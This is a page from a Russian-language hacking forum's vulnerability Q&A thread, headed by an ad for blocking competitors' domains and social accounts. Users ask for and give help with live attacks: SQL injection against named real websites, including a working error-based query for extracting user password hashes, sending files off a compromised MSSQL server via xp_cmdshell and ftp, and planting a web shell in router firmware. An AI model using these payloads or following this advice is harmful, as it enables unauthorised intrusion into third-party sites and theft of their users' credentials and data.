УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1936 из 2438

1936

Опции темы

Поиск в этой теме

Опции просмотра

#19351

26.01.2012, 12:18

Ro Man

Новичок

Регистрация: 04.06.2007

Сообщений: 12

Провел на форуме:
580611

Репутация: 38

Отправить сообщение для Ro Man с помощью ICQ

возможно ли в прошивку модема адсл вшить веб шелл?

#19352

26.01.2012, 14:16

Boolean

Guest

Сообщений: n/a

Провел на форуме:
40748

Репутация: 78

Цитата:

Сообщение от Ro Man

Ro Man said:
возможно ли в прошивку модема адсл вшить веб шелл?

Зачем? Что толку от веб-шелла то?

p.s хотя можно попробовать залить cgi шелл, но не уверен.

Код:

Code:
Login: admin
Password:
NAME=DSL_2640NRU
VERSION=1.0.0
BUILDTIME=Fri Mar 18 08:01:43 UTC 2011
VENDOR=D-Link Russia
BUGS=
SUMMARY=Root filesystem image for DSL_2640NRU
BOARDID=96328AVNG_N31
For help, type 'help' or '?'.
DSL_2640NRU# sh

BusyBox v1.00 (2011.03.18-07:59+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# ls /
VERSION  data     etc      linuxrc  opt      sbin     tmp      var
bin      dev      lib      mnt      proc     sys      usr      webs
# ls /webs/
www
# ls /webs/www
css           favicon.ico   index.cgi     passw.html
dlink.css     fwupdate.cgi  index.html    scripts
fastweb.cgi   image         info.html     templates
#

#19353

26.01.2012, 17:31

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Народ, помогите разкрутиить скулю, никак не могу подобрать количество колонок

Цитата:

Сообщение от None

http://www.gorod-dolgoprudny.ru/auto_ads.php?aid=7'

#19354

26.01.2012, 18:21

Gul4atai

Guest

Сообщений: n/a

Провел на форуме:
344

Репутация: 0

Post Sql

Запрос для выполнения SQL инъекции:

POST /register.php HTTP/1.1

Host: partners.gigagame.ru

Content-Type: application/x-www-form-urlencoded

Content-Length: 78

email='&passone=1&passtwo=1&lastname=1&firstname=1 &midname=1&keeper=1&Submit=1

Результат работы

тнера

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/cdmag/data/www/dvdshka.ru/partners/partners_ufunctions.php on line 264

Адрес электронной почты не может быть без символа "@"
Вы не указали адреса своих сайтов
Вы не правильно указали WMR кош

______________________________________________

Каким образом выполнить SQL инъекция по методу post исходя из текущих данных?

#19355

26.01.2012, 20:47

exzi11

Guest

Сообщений: n/a

Провел на форуме:
6736

Репутация: 0

Сайт на Joomle. Как определить её версию?

#19356

26.01.2012, 21:09

AlonDelon

Guest

Сообщений: n/a

Провел на форуме:
106017

Репутация: -3

Цитата:

Сообщение от exzi11

exzi11 said:
Сайт на Joomle. Как определить её версию?

http://site.com/configuration.php-dist

или в исходниках админки:

http://www.site.com/administrator/

#19357

26.01.2012, 21:45

DeepBlue7

Познающий

Регистрация: 02.01.2009

Сообщений: 90

Провел на форуме:
390073

Репутация: 44

Вот вопросег... есть юзер mssql (2008 r2), с xp_cmdshell. Хочу зааплоудить файлики с харда серва на фтп. Делаю так со своей машины :

Start run cmd ->

Код:

Code:
ftp -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR

Всё канает - фтп выполняет содержимое cmd.txt после подключения к ftp. Но вот если делать так :

Код:

Code:
exec xp_cmdshell 'c:\windows\system32\ftp.exe -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR'

- канать не хочет. Пишет

Код:

Code:
Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
NULL
Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.
.............................

Подскажите, что может быть не так ? )

#19358

26.01.2012, 21:53

h.elg

Guest

Сообщений: n/a

Провел на форуме:
2435

Репутация: 0

Движок webasyst

Посмотрел видео: http://www.youtube.com/watch?v=DgXCGzRLvYY

Дохожу до момента Duplicate entry for key group с помощью

Цитата:

Сообщение от None

- index.php?ukey=news&blog_id=(select+1+from+(select +count(0),concat((select+version()),floor(rand(0)* 2))+from+SC_news_table+group+by+2+limit+1)a)--+

Как дальше выдрать хешы?

Колонки

U_ID

U_PASSWORD

#19359

26.01.2012, 21:57

trololoman96

Guest

Сообщений: n/a

Провел на форуме:
29020

Репутация: 55

ну так вместо вывода версии (select+version()) пиши свой запрос, типа

Код:

Code:
select concat_ws(0x3a,u_id,u_password) from имя_таблицы_в_которой_пасс limit 0,1

очевидно же

#19360

26.01.2012, 22:03

h.elg

Guest

Сообщений: n/a

Провел на форуме:
2435

Репутация: 0

не смог зделать сам по этому прошу помощь >.

Страница 1936 из 2438

1936

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход